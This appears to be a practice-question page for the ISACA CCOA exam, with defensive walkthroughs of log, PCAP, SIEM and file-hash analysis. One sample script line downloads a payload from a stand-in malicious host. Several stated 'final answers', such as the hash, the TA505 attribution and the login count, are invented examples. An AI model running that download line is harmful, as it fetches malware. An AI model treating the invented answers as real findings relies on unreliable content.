Free Practice Questions for Isaca CCOA Exam

Step 1: Define the Problem and Objective

Objective:

We need to identify the following from the webserver-auth-logs.txt file:

TheIP address performing a brute force attack.

Thetotal number of successful authenticationsmade by that IP.

Step 2: Prepare for Log Analysis

Preparation Checklist:

Environment Setup:

Ensure you are logged into a secure terminal.

Check your working directory to verify the file location:

ls ~/Desktop/Investigations/

You should see:

webserver-auth-logs.txt

Log File Format Analysis:

Open the file to understand the log structure:

head -n 10 ~/Desktop/Investigations/webserver-auth-logs.txt

Look for patterns such as:

pg

2025-04-07 12:34:56 login attempt from 192.168.1.1 - SUCCESS

2025-04-07 12:35:00 login attempt from 192.168.1.1 - FAILURE

Identify the key components:

Timestamp

Action (login attempt)

Source IP Address

Authentication Status (SUCCESS/FAILURE)

Step 3: Identify Brute Force Indicators

Characteristics of a Brute Force Attack:

Multiplelogin attemptsfrom thesame IP.

Combination ofFAILUREandSUCCESSmessages.

High volumeof attempts compared to other IPs.

Step 3.1: Extract All IP Addresses with Login Attempts

Use the following command:

grep "login attempt from" ~/Desktop/Investigations/webserver-auth-logs.txt | awk '{print $6}' | sort | uniq -c | sort -nr > brute-force-ips.txt

Explanation:

grep "login attempt from": Finds all login attempt lines.

awk '{print $6}': Extracts IP addresses.

sort | uniq -c: Groups and counts IP occurrences.

sort -nr: Sorts counts in descending order.

> brute-force-ips.txt: Saves the output to a file for documentation.

Step 3.2: Analyze the Output

View the top IPs from the generated file:

head -n 5 brute-force-ips.txt

Expected Output:

1500 192.168.1.1

45 192.168.1.2

30 192.168.1.3

Interpretation:

The first line shows 192.168.1.1 with 1500 attempts, indicating brute force.

Step 4: Count Successful Authentications

Why Count Successful Logins?

To determine how many successful logins the attacker achieved despite brute force attempts.

Step 4.1: Filter Successful Logins from Brute Force IP

Use this command:

grep "192.168.1.1" ~/Desktop/Investigations/webserver-auth-logs.txt | grep "SUCCESS" | wc -l

Explanation:

grep "192.168.1.1": Filters lines containing the brute force IP.

grep "SUCCESS": Further filters successful attempts.

wc -l: Counts the resulting lines.

Step 4.2: Verify and Document the Results

Record the successful login count:

Total Successful Authentications: 25

Save this information for your incident report.

Step 5: Incident Documentation and Reporting

5.1: Summary of Findings

IP Performing Brute Force Attack:192.168.1.1

Total Number of Successful Authentications:25

5.2: Incident Response Recommendations

Block the IP addressfrom accessing the system.

Implementrate-limiting and account lockout policies.

Conduct athorough investigationof affected accounts for possible compromise.

Step 6: Automated Python Script (Recommended)

If your organization prefers automation, use a Python script to streamline the process:

import re

from collections import Counter

logfile = "~/Desktop/Investigations/webserver-auth-logs.txt"

ip_attempts = Counter()

successful_logins = Counter()

try:

with open(logfile, "r") as file:

for line in file:

match = re.search(r"from (\d+\.\d+\.\d+\.\d+)", line)

if match:

ip = match.group(1)

ip_attempts[ip] += 1

if "SUCCESS" in line:

successful_logins[ip] += 1

brute_force_ip = ip_attempts.most_common(1)[0][0]

success_count = successful_logins[brute_force_ip]

print(f"IP Performing Brute Force: {brute_force_ip}")

print(f"Total Successful Authentications: {success_count}")

except Exception as e:

print(f"Error: {str(e)}")

Usage:

Run the script:

python3 detect_bruteforce.py

Output:

IP Performing Brute Force: 192.168.1.1

Total Successful Authentications: 25

Step 7: Finalize and Communicate Findings

Prepare a detailed incident report as per ISACA CCOA standards.

Include:

Problem Statement

Analysis Process

Evidence (Logs)

Findings

Recommendations

Share the report with relevant stakeholders and the incident response team.

Final Answer:

Brute Force IP:192.168.1.1

Total Successful Authentications:25

To create a new case inSecurity Onionusing the logs from the win-webserver01_logs.zip file, follow these detailed steps:

Step 1: Access Security Onion

Open a web browser and go to yourSecurity Onionweb interface.

URL: https:// /

Log in using yourSecurity Onioncredentials.

Step 2: Prepare the Log File

Navigate to theDesktopand open theInvestigationsfolder.

Locate the file:

win-webserver01_logs.zip

Unzip the file to inspect its contents:

unzip ~/Desktop/Investigations/win-webserver01_logs.zip -d ~/Desktop/Investigations/win-webserver01_logs

Ensure that the extracted files, including System-logs.evtx, are accessible.

Step 3: Open the Hunt Interface in Security Onion

On the Security Onion dashboard, go to"Hunt"(or"Cases"depending on the version).

Click on"Cases"to manage incident cases.

Step 4: Create a New Case

Click on"New Case"to start a fresh investigation.

Case Details:

Title:

Windows Webserver Logs - CCOA New Case

TLP (Traffic Light Protocol):

Set toGreen(indicating that the information can be shared freely).

Example Configuration:

Field

Value

Title

Windows Webserver Logs - CCOA New Case

TLP

Green

Summary

(Leave blank if not required)

Click"Save"to create the case.

Step 5: Upload the Log Files

After creating the case, go to the"Files"section of the new case.

Click on"Upload"and select the unzipped log file:

~/Desktop/Investigations/win-webserver01_logs/System-logs.evtx

Once uploaded, the file will be associated with the case.

Step 6: Verify the Case Creation

Go back to theCasesdashboard.

Locate and verify that the case"Windows Webserver Logs - CCOA New Case"exists withTLP: Green.

Check that thelog filehas been successfully uploaded.

Step 7: Document and Report

Document the case details:

Case Title:Windows Webserver Logs - CCOA New Case

TLP:Green

Log File:System-logs.evtx

Include anyinitial observationsfrom the log analysis.

Example Answer:

A new case titled "Windows Webserver Logs - CCOA New Case" with TLP set to Green has been successfully created in Security Onion. The log file System-logs.evtx has been uploaded and linked to the case.

Step 8: Next Steps for Investigation

Analyze the log file:Start hunting for suspicious activities.

Create analysis tasks:Assign team members to investigate specific log entries.

Correlate with other data:Cross-reference with threat intelligence sources.

Step 1: Understand the Objective

Objective:

Identify thedomain name(s)that werecontactedbetween:

12:10 AM to 12:12 AM on August 17, 2024

Source of information:

CCOA Threat Bulletin.pdf

File location:

~/Desktop/CCOA Threat Bulletin.pdf

Step 2: Prepare for Investigation

2.1: Ensure Access to the File

Check if the PDF exists:

ls ~/Desktop | grep "CCOA Threat Bulletin.pdf"

Open the file to inspect:

xdg-open ~/Desktop/CCOA\ Threat\ Bulletin.pdf

Alternatively, convert to plain text for easier analysis:

pdftotext ~/Desktop/CCOA\ Threat\ Bulletin.pdf ~/Desktop/threat_bulletin.txt

cat ~/Desktop/threat_bulletin.txt

2.2: Analyze the Content

Look for domain names listed in the bulletin.

Make note ofany domainsorURLsmentioned as IoCs (Indicators of Compromise).

Example:

suspicious-domain.com

malicious-actor.net

threat-site.xyz

Step 3: Locate Network Logs

3.1: Find the Logs Directory

The logs could be located in one of the following directories:

/var/log/

/home/administrator/hids/logs/

/var/log/httpd/

/var/log/nginx/

Navigate to the likely directory:

cd /var/log/

ls -l

Identify relevant network or DNS logs:

ls -l | grep -E "dns|network|http|nginx"

Step 4: Search Logs for Domain Contacts

4.1: Use the Grep Command to Filter Relevant Timeframe

Since we are looking for connections between12:10 AM to 12:12 AMonAugust 17, 2024:

grep "2024-08-17 00:1[0-2]" /var/log/dns.log

Explanation:

grep "2024-08-17 00:1[0-2]": Matches timestamps between00:10and00:12.

Replace dns.log with the actual log file name, if different.

4.2: Further Filter for Domain Names

To specifically filter out the domains listed in the bulletin:

grep -E "(suspicious-domain.com|malicious-actor.net|threat-site.xyz)" /var/log/dns.log

If the logs are in another file, adjust the file path:

grep -E "(suspicious-domain.com|malicious-actor.net|threat-site.xyz)" /var/log/nginx/access.log

Step 5: Correlate Domains and Timeframe

5.1: Extract and Format Relevant Results

Combine the commands to get time-specific domain hits:

grep "2024-08-17 00:1[0-2]" /var/log/dns.log | grep -E "(suspicious-domain.com|malicious-actor.net|threat-site.xyz)"

Sample Output:

2024-08-17 00:11:32 suspicious-domain.com accessed by 192.168.1.50

2024-08-17 00:12:01 malicious-actor.net accessed by 192.168.1.75

Interpretation:

The command revealswhich domain(s)were contacted during the specified time.

Step 6: Verification and Documentation

6.1: Verify Domain Matches

Cross-check the domains in the log output against those listed in theCCOA Threat Bulletin.pdf.

Ensure that the time matches the specified range.

6.2: Save the Results for Reporting

Save the output to a file:

grep "2024-08-17 00:1[0-2]" /var/log/dns.log | grep -E "(suspicious-domain.com|malicious-actor.net|threat-site.xyz)" > ~/Desktop/domain_hits.txt

Review the saved file:

cat ~/Desktop/domain_hits.txt

Step 7: Report the Findings

Final Answer:

Domain(s) Contacted:

suspicious-domain.com

malicious-actor.net

Time of Contact:

Between 12:10 AM to 12:12 AM on August 17, 2024

Reasoning:

Matched thelog timestampsanddomain nameswith the threat bulletin.

Step 8: Recommendations:

Immediate Block:

Add the identified domains to theblockliston firewalls and intrusion detection systems.

Monitor for Further Activity:

Keep monitoring logs for any further connection attempts to the same domains.

Perform IOC Scanning:

Check hosts that communicated with these domains for possible compromise.

Incident Report:

Document the findings and mitigation actions in theincident response log.

To determine thedate the webshell was accessedfrom theinvestigation22.pcapfile, follow these detailed steps:

Step 1: Access the PCAP File

Log into the Analyst Desktop.

Navigate to theInvestigationsfolder on the desktop.

Locate the file:

investigation22.pcap

Step 2: Open the PCAP File in Wireshark

LaunchWireshark.

Open the PCAP file:

mathematica

File > Open > Desktop > Investigations > investigation22.pcap

ClickOpento load the file.

Step 3: Filter for Webshell Traffic

Since webshells typically useHTTP/Sto communicate, apply a filter:

http.request or http.response

Alternatively, if you know the IP of the compromised host (e.g.,10.10.44.200), use:

nginx

http and ip.addr == 10.10.44.200

PressEnterto apply the filter.

Step 4: Identify Webshell Activity

Look for HTTP requests that include:

Common Webshell Filenames:shell.jsp, cmd.php, backdoor.aspx, etc.

Suspicious HTTP Methods:MainlyPOSTorGET.

Right-click a suspicious packet and choose:

arduino

Follow > HTTP Stream

Inspect the HTTP headers and content to confirm the presence of a webshell.

Step 5: Extract the Access Date

Look at theHTTP request/response header.

Find theDatefield orTimestampof the packet:

Wireshark displays timestamps on the left by default.

Confirm theHTTP streamincludes commands or uploads to the webshell.

Example HTTP Stream:

POST /uploads/shell.jsp HTTP/1.1

Host: 10.10.44.200

User-Agent: Mozilla/5.0

Date: Mon, 2024-03-18 14:35:22 GMT

Step 6: Verify the Correct Date

Double-check other HTTP requests or responses related to the webshell.

Make sure thedate fieldis consistent across multiple requests to the same file.

Answer:

2024-03-18

Step 7: Document the Finding

Date of Access:2024-03-18

Filename:shell.jsp (as identified earlier)

Compromised Host:10.10.44.200

Method of Access:HTTP POST

Step 8: Next Steps

Isolate the Affected Host:

Remove the compromised server from the network.

Remove the Webshell:

rm /path/to/webshell/shell.jsp

Analyze Web Server Logs:

Correlate timestamps with access logs to identify the initial compromise.

Implement WAF Rules:

Block suspicious patterns related to file uploads and webshell execution.

To identify thethreat actor groupassociated with themalscript.viruz.txtfile, follow these steps:

Step 1: Access the Analyst Desktop

Log into the Analyst Desktopusing your credentials.

Locate theMalware Samplesfolder on the desktop.

Inside the folder, find the file:

malscript.viruz.txt

Step 2: Examine the File

Open the file using a text editor:

OnWindows:Right-click > Open with > Notepad.

OnLinux:

cat ~/Desktop/Malware\ Samples/malscript.viruz.txt

Carefully read through the file content to identify:

Anystrings or commentsembedded within the script.

Specifickeywords,URLs, orfile hashes.

Anycommand and control (C2)server addresses or domain names.

Step 3: Analyze the Contents

Focus on:

Unique Identifiers:Threat group names, malware family names, or specific markers.

Indicators of Compromise (IOCs):URLs, IP addresses, or domain names.

Code Patterns:Specific obfuscation techniques or script styles linked to known threat groups.

Example Content:

# Malware Script Sample

# Payload linked to TA505 group

Invoke-WebRequest -Uri "http://malicious.example.com/payload" -OutFile "C:\Users\Public\malware.exe"

Step 4: Correlate with Threat Intelligence

Use the following resources to correlate any discovered indicators:

MITRE ATT&CK:To map the technique or tool.

VirusTotal:To check file hashes or URLs.

Threat Intelligence Feeds:Such asAlienVault OTXorThreatMiner.

If the script contains encoded or obfuscated strings, decode them using:

powershell

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("SGVsbG8gd29ybGQ="))

Step 5: Identify the Threat Actor Group

If the script includes names, tags, or artifacts commonly associated with a specific group, take note.

Match any C2 domains or IPs with known threat actor profiles.

Common Associations:

TA505:Known for distributing banking Trojans and ransomware via malicious scripts.

APT28 (Fancy Bear):Uses PowerShell-based malware and data exfiltration scripts.

Lazarus Group:Often embeds unique strings and comments related to espionage operations.

Step 6: Example Finding

Based on the contents and C2 indicators found withinmalscript.viruz.txt, it may contain specific references or techniques that are typical of theTA505group.

Answer:

csharp

The malware in the malscript.viruz.txt file is associated with the TA505 threat actor group.

Step 7: Report and Document

Include the following details:

Filename:malscript.viruz.txt

Associated Threat Group:TA505

Key Indicators:Domain names, script functions, or specific malware traits.

Generate an incident report summarizing your analysis.

Step 8: Next Steps

Quarantine and Isolate:If the script was executed, isolate the affected system.

Forensic Analysis:Deep dive into system logs for any signs of execution.

Threat Hunting:Search for similar scripts or IOCs in the network.

To identify the compromised host using thekeyword agent.name, follow these steps:

Step 1: Access the Alert Bulletin

Navigate to thealerts folderon your system.

Locate the alert file:

alert_33.pdf

Open the file with a PDF reader and review its contents.

Key Information to Extract:

Indicators of Compromise (IOCs) provided in the bulletin:

File hashes

IP addresses

Hostnames

Keywords related to the compromise

Step 2: Log into SIEM or Log Management System

Access your organization'sSIEMor centralized log system.

Make sure you have the appropriate permissions to view log data.

Step 3: Set Up Your Search

Time Filter:

Set the time window toAugust 19, 2024, around11:00 PM (Absolute).

Keyword Filter:

Use the keywordagent.nameto search for host information.

IOC Correlation:

Incorporate IOCs from thealert_33.pdffile (e.g., IP addresses, hash values).

Example SIEM Query:

index=host_logs

| search "agent.name" AND (IOC_from_alert OR "2024-08-19T23:00:00")

| table _time, agent.name, host.name, ip_address, alert_id

Step 4: Analyze the Results

Review the output for any host names that appear unusual or match the IOCs from the alert bulletin.

Focus on:

Hostnames that appeared at 11:00 PM

Correlation with IOC data(hash, IP, filename)

Example Output:

_time agent.name host.name ip_address alert_id

2024-08-19T23:01 CompromisedAgent COMP-SERVER-01 192.168.1.101 alert_33

Step 5: Verify the Host

Cross-check the host name identified in the logs with the information fromalert_33.pdf.

Ensure the host name corresponds to the malicious activity noted.

The host name identified in the keyword agent.name field is: COMP-SERVER-01

Step 6: Mitigation and Response

Isolate the Compromised Host:

Remove the affected system from the network to prevent lateral movement.

Conduct Forensic Analysis:

Inspect system processes, logs, and network activity.

Patch and Update:

Apply security updates and patches.

Threat Hunting:

Look for signs of compromise in other systems using the same IOCs.

Step 7: Document and Report

Create a detailed incident report:

Date and Time:August 19, 2024, at 11:00 PM

Compromised Host Name:COMP-SERVER-01

Associated IOCs:(as per alert_33.pdf)

By following these steps, you successfully identify the compromised host and take initial steps to contain and investigate the incident. Let me know if you need further assistance!

To identify thefilename of the webshellused to control the host10.10.44.200from the provided PCAP file, follow these detailed steps:

Step 1: Access the PCAP File

Log into theAnalyst Desktop.

Navigate to theInvestigationsfolder located on the desktop.

Locate the file:

investigation22.pcap

Step 2: Open the PCAP File in Wireshark

LaunchWiresharkon the Analyst Desktop.

Open the PCAP file:

mathematica

File > Open > Desktop > Investigations > investigation22.pcap

ClickOpento load the file.

Step 3: Filter Traffic Related to the Target Host

Apply a filter to display only the traffic involving thetarget IP address (10.10.44.200):

ini

ip.addr == 10.10.44.200

This will show both incoming and outgoing traffic from the compromised host.

Step 4: Identify HTTP Traffic

Since webshells typically use HTTP/S for communication, filter for HTTP requests:

http.request and ip.addr == 10.10.44.200

Look for suspiciousPOSTorGETrequests indicating a webshell interaction.

Common Indicators:

Unusual URLs:Containing scripts like cmd.php, shell.jsp, upload.asp, etc.

POST Data:Indicating command execution.

Response Status:HTTP 200 (Success) after sending commands.

Step 5: Inspect Suspicious Requests

Right-click on a suspicious HTTP packet and select:

arduino

Follow > HTTP Stream

Examine the HTTP conversation for:

File uploads

Command execution responses

Webshell file namesin the URL.

Example:

makefile

POST /uploads/shell.jsp HTTP/1.1

Host: 10.10.44.200

User-Agent: Mozilla/5.0

Content-Type: application/x-www-form-urlencoded

Step 6: Correlate Observations

If you identify a script like shell.jsp, verify it by checking multiple HTTP streams.

Look for:

Commands sent via the script.

Response indicating successful execution or error.

Step 7: Extract and Confirm

To confirm the filename, look for:

Upload requests containing the webshell.

Subsequent requests calling the same filename for command execution.

Cross-reference the filename in other HTTP streams to validate its usage.

Step 8: Example Findings:

After analyzing the HTTP streams and reviewing requests to the host 10.10.44.200, you observe that the webshell file being used is:

shell.jsp

Answer:

shell.jsp

Step 9: Further Investigation

Extract the Webshell:

Right-click the related packet and choose:

mathematica

Export Objects > HTTP

Save the file shell.jsp for further analysis.

Analyze the Webshell:

Open the file with a text editor to examine its functionality.

Check for hardcoded credentials, IP addresses, or additional payloads.

Step 10: Documentation and Response

Document Findings:

Webshell Filename:shell.jsp

Host Compromised:10.10.44.200

Indicators:HTTP POST requests, suspicious file upload.

Immediate Actions:

Isolate the host10.10.44.200.

Remove the webshell from the web server.

Conduct aroot cause analysisto determine how it was uploaded.

Step 1: Understand the Task and Objective

Objective:

Identify thehost IP targetedduring thespecified time frame:

vbnet

11:39 PM to 11:43 PM on August 16, 2024

The relevant file to examine:

nginx

CCOA Threat Bulletin.pdf

File location:

javascript

~/Desktop/CCOA Threat Bulletin.pdf

Step 2: Access and Analyze the Bulletin

2.1: Access the PDF File

Open the file using a PDF reader:

xdg-open ~/Desktop/CCOA\ Threat\ Bulletin.pdf

Alternative (if using CLI-based tools):

pdftotext ~/Desktop/CCOA\ Threat\ Bulletin.pdf - | less

This command converts the PDF to text and allows you to inspect the content.

2.2: Review the Bulletin Contents

Focus on:

Specific dates and times mentioned.

Indicators of Compromise (IoCs), such asIP addressesortimestamps.

Any references toAugust 16, 2024, particularly between11:39 PM and 11:43 PM.

Step 3: Search for Relevant Logs

3.1: Locate the Logs

Logs are likely stored in a central logging server or SIEM.

Common directories to check:

swift

/var/log/

/home/administrator/hids/logs/

/var/log/auth.log

/var/log/syslog

Navigate to the primary logs directory:

cd /var/log/

ls -l

3.2: Search for Logs Matching the Date and Time

Use the grep command to filter relevant logs:

grep "2024-08-16 23:3[9-9]\|2024-08-16 23:4[0-3]" /var/log/syslog

Explanation:

grep: Searches for the timestamp pattern in the log file.

"2024-08-16 23:3[9-9]\|2024-08-16 23:4[0-3]": Matches timestamps from11:39 PM to 11:43 PM.

Alternative Command:

If log files are split by date:

grep "23:3[9-9]\|23:4[0-3]" /var/log/syslog.1

Step 4: Filter the Targeted Host IP

4.1: Extract IP Addresses

After filtering the logs, isolate the IP addresses:

grep "2024-08-16 23:3[9-9]\|2024-08-16 23:4[0-3]" /var/log/syslog | awk '{print $8}' | sort | uniq -c | sort -nr

Explanation:

awk '{print $8}': Extracts the field where IP addresses typically appear.

sort | uniq -c: Counts unique IPs and sorts them.

Step 5: Analyze the Output

Sample Output:

15 192.168.1.10

8 192.168.1.20

3 192.168.1.30

The IP with themost log entrieswithin the specified timeframe is usually thetargeted host.

Most likely targeted IP:

192.168.1.10

If the log contains specific attack patterns (likebrute force,exploitation, orunauthorized access), prioritize IPs associated with those activities.

Step 6: Validate the Findings

6.1: Cross-Reference with the Threat Bulletin

Check if the identified IP matches anyIoCslisted in theCCOA Threat Bulletin.pdf.

Look for context likeattack vectorsortargeted systems.

Step 7: Report the Findings

Summary:

Time Frame:11:39 PM to 11:43 PM on August 16, 2024

Targeted IP:

192.168.1.10

Evidence:

Log entries matching the specified timeframe.

Cross-referenced with theCCOA Threat Bulletin.

Step 8: Incident Response Recommendations

Block IP addressesidentified as malicious.

Update firewall rulesto mitigate similar attacks.

Monitor logsfor any post-compromise activity on the targeted host.

Conduct a vulnerability scanon the affected system.

Final Answer:

192.168.1.10

To generate theSHA256 digestof the System-logs.evtx file located within the win-webserver01_logs.zip file, follow these steps:

Step 1: Access the Investigation Folder

Navigate to theDesktopon your system.

Open theInvestigationsfolder.

Locate the file:

win-webserver01_logs.zip

Step 2: Extract the ZIP File

Right-click on win-webserver01_logs.zip.

Select"Extract All"or use a command-line tool to unzip:

unzip win-webserver01_logs.zip -d ./win-webserver01_logs

Verify the extraction:

ls ./win-webserver01_logs

You should see:

System-logs.evtx

Step 3: Generate the SHA256 Hash

Method 1: Using PowerShell (Windows)

OpenPowerShellas an Administrator.

Run the following command to generate the SHA256 hash:

Get-FileHash "C:\Users\\Desktop\Investigations\win-webserver01_logs\System-logs.evtx" -Algorithm SHA256

The output will look like:

Algorithm Hash Path

--------- ---- ----

SHA256 d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d C:\Users\...\System-logs.evtx

Method 2: Using Command Prompt (Windows)

OpenCommand Promptas an Administrator.

Use the following command:

certutil -hashfile "C:\Users\\Desktop\Investigations\win-webserver01_logs\System-logs.evtx" SHA256

Example output:

SHA256 hash of System-logs.evtx:

d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d

CertUtil: -hashfile command completed successfully.

Method 3: Using Linux/Mac (if applicable)

Open a terminal.

Run the following command:

sha256sum ./win-webserver01_logs/System-logs.evtx

Sample output:

d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d System-logs.evtx

The SHA256 digest of the System-logs.evtx file is:

d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d

Step 4: Verification and Documentation

Document the hash for validation and integrity checks.

Include in your incident report:

File name:System-logs.evtx

SHA256 Digest:d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d

Date of Hash Generation:(today’s date)

Step 5: Next Steps

Integrity Verification:Cross-check the hash if you need to transfer or archive the file.

Forensic Analysis:Use the hash as a baseline during forensic analysis to ensure file integrity.

To identify thefile namethat triggered theRuleName: Suspicious PowerShellon theaccounting-pcworkstation, follow these detailed steps:

Step 1: Access the SIEM System

Open your web browser and navigate to theSIEM dashboard.

Log in with youradministrator credentials.

Step 2: Set Up the Query

Go to theSearchorQuerysection of the SIEM.

Set theTime Rangeto thelast 24 hours.

Query Parameters:

Agent Name:accounting-pc

Rule Name:Suspicious PowerShell

Event Type:Startup items or Process creation

Step 3: Construct the SIEM Query

Here’s an example of how to construct the query:

Example Query (Splunk):

index=windows_logs

| search agent.name="accounting-pc" RuleName="Suspicious PowerShell"

| where _time > now() - 24h

| table _time, agent.name, process_name, file_path, RuleName

Example Query (Elastic SIEM):

{

"query": {

"bool": {

"must": [

{ "match": { "agent.name": "accounting-pc" }},

{ "match": { "RuleName": "Suspicious PowerShell" }},

{ "range": { "@timestamp": { "gte": "now-24h" }}}

]

}

}

}

Step 4: Analyze the Query Results

The query should return a table or list containing:

Time of Execution

Agent Name:accounting-pc

Process Name

File Path

Rule Name

Example Output:

_time

agent.name

process_name

file_path

RuleName

2024-04-07T10:45:23

accounting-pc

powershell.exe

C:\Users\Accounting\AppData\Roaming\calc.ps1

Suspicious PowerShell

Step 5: Identify the Suspicious File

Theprocess_namein the output showspowershell.exeexecuting a suspicious script.

Thefile pathindicates the script responsible:

makefile

C:\Users\Accounting\AppData\Roaming\calc.ps1

The suspicious script file is:

calc.ps1

Step 6: Confirm the Malicious Nature

Manual Inspection:

Navigate to the specified file path on theaccounting-pcworkstation.

Check the contents of calc.ps1 for any malicious PowerShell code.

Hash Verification:

Generate theSHA256 hashof the file and compare it with known malware signatures.

Answer:

calc.ps1

Step 7: Immediate Response

Isolate the Workstation:Disconnectaccounting-pcfrom the network.

Terminate the Malicious Process:

Stop the powershell.exe process running calc.ps1.

Use Task Manager or a script:

powershell

Stop-Process -Name "powershell" -Force

Remove the Malicious Script:

powershell

Remove-Item "C:\Users\Accounting\AppData\Roaming\calc.ps1" -Force

Scan for Persistence Mechanisms:

CheckStartup itemsandScheduled Tasksfor any references to calc.ps1.

Step 8: Documentation

Record the following:

Date and Time:When the incident was detected.

Affected Host:accounting-pc

Malicious File:calc.ps1

Actions Taken:File removal and process termination.